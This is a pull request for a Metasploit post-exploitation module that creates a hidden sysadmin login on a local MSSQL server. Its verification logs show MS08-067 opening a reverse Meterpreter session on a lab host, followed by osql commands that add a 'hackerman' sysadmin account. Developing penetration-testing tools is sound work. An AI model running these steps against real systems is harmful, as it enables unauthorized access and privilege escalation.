### PR TITLE
Deal with other osql banners and responses

### DIFF
--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -185,6 +185,7 @@ class Metasploit3 < Msf::Post
 		if services_array1.join =~ /(SQL Server Command Line Tool)|(usage: osql)/
 			print_good("OSQL client was found")
 			return "osql"
+		end
 
 		# Get Data - sqlcmd
 		running_services = run_cmd("sqlcmd -?")

--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -182,12 +182,9 @@ class Metasploit3 < Msf::Post
 		services_array1 = running_services1.split("\n")
 
 		# Check for osql
-		services_array1.each do |service1|
-			if service1 =~ /SQL Server Command Line Tool/ then
-				print_good("OSQL client was found")
-				return "osql"
-			end
-		end
+		if services_array1.join =~ /(SQL Server Command Line Tool)|(usage: osql)/
+			print_good("OSQL client was found")
+			return "osql"
 
 		# Get Data - sqlcmd
 		running_services = run_cmd("sqlcmd -?")
@@ -252,11 +249,11 @@ class Metasploit3 < Msf::Post
 		end
 
 		# check for success/fail
-		if add_login_result == ""
+		if add_login_result.empty? or add_login_result =~ /New login created./
 			print_good("Successfully added login \"#{dbuser}\" with password \"#{dbpass}\"")
 			return 1
 		else
-			print_error("Unabled to add login #{dbuser}")
+			print_error("Unable to add login #{dbuser}")
 			print_error("Database Error:\n #{add_login_result}")
 			return 0
 		end


### PR DESCRIPTION
Not sure where those other banners come from, but keeping them as positive responses regardless.
## Verification
- [x] Generate a session to a MSSQL host using Meterpreter. MS08-067 will do if you have a vulnerable target (I'm using Win2k3 Enterprise).
- [x] Run mssql_local_auth_bypass and see a successful result.
## Proof

The MS08-067 session:

```
msf exploit(ms08_067_netapi) > exploit

[*] Started HTTP reverse handler on http://192.168.145.1:8080/
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 192.168.145.60:2833 Request received for /fS9j...
[*] 192.168.145.60:2833 Staging connection for target /fS9j received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 1 opened (192.168.145.1:8080 -> 192.168.145.60:2833) at 2013-03-31 23:23:21 -0500

meterpreter > background
[*] Backgrounding session 1...

```

The post module:

```
msf exploit(ms08_067_netapi) > use post/windows/manage/mssql_local_auth_bypass 
msf post(mssql_local_auth_bypass) > show options

Module options (post/windows/manage/mssql_local_auth_bypass):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DB_PASSWORD                    yes       Password for new sysadmin login
   DB_USERNAME                    yes       New sysadmin login
   INSTANCE                       no        Name of target SQL Server instance
   REMOVE_LOGIN  false            no        Remove DB_USERNAME login from database
   SESSION                        yes       The session to run this module on.
   VERBOSE       false            no        Set how verbose the output should be

msf post(mssql_local_auth_bypass) > set db_username hackerman
db_username => hackerman
msf post(mssql_local_auth_bypass) > set db_password password1
db_password => password1
msf post(mssql_local_auth_bypass) > set session 1
session => 1
msf post(mssql_local_auth_bypass) > set verbose true
verbose => true
msf post(mssql_local_auth_bypass) > exploit

[*] Running module against USER-CH1Y9QPIKW
[*] Checking if user is SYSTEM...
[+] User is SYSTEM
[*] Checking for SQL Server...
[+] SQL Server instance found: MSSQLSERVER
[*] Checking for native client...
[+] OSQL client was found
[*] Attempting to add new login hackerman...
[*]  o MSSQL Service instance: MSSQLSERVER
[*] Running command:
[*] osql -E -S USER-CH1Y9QPIKW -Q "sp_addlogin 'hackerman','password1'"
[+] Successfully added login "hackerman" with password "password1"
[*] Attempting to make hackerman login a sysadmin...
[*] Running command:
[*] osql -E -S USER-CH1Y9QPIKW -Q "sp_addsrvrolemember 'hackerman','sysadmin';if (select is_srvrolemember('sysadmin'))=1 begin select 'bingo' end "
[+] Successfully added "hackerman" to sysadmin role
[*] Post module execution completed
msf post(mssql_local_auth_bypass) > 

```
